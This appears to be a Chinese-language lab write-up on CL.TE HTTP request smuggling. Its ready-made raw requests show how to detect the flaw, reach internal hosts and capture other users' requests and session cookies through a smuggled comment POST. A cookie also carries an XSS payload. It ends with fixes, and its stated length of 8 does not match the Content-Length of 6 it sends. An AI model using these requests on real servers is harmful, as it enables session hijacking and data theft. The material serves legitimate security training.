HTTP request smuggling CL.TE

CL.TE 簡介

前端經過Content-Length處理請求，經過反向代理或者負載均衡將請求轉發到後端，後端Transfer-Encoding優先級較高，以TE處理請求形成安全問題。

檢測

發送以下數據包

POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 6
Transfer-Encoding: chunked

0

P

CT長度爲8，前端將body全發給後端，後端看到TE後讀取到0\r\n\r\n後標誌結束，P被留在緩衝區，等待下一次被請求。當再次請求下面的數據包

GET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>

P拼接到了下次請求變成

PGET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>

利用

一、因爲在第二個包中能夠加入HOST，咱們能夠經過添加HOST達到訪問內部資源的目的。
二、劫持其餘用戶請求。找到一個相似評論，留言板的功能。

POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 1031
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
Content-Length: 613
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxx

注意CL必定要設置成正好將下一個數據包拼接過來的長度。等待其餘用戶訪問網站時，好比下一個用戶的數據包是下面這樣。

GET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>

拼接後

POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 1031
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
Content-Length: 613
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxxGET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>

這樣查看評論便可看到其餘人的請求。

修復

• 先後端處理請求採用同一種方式
• 使用HTTP/2協議。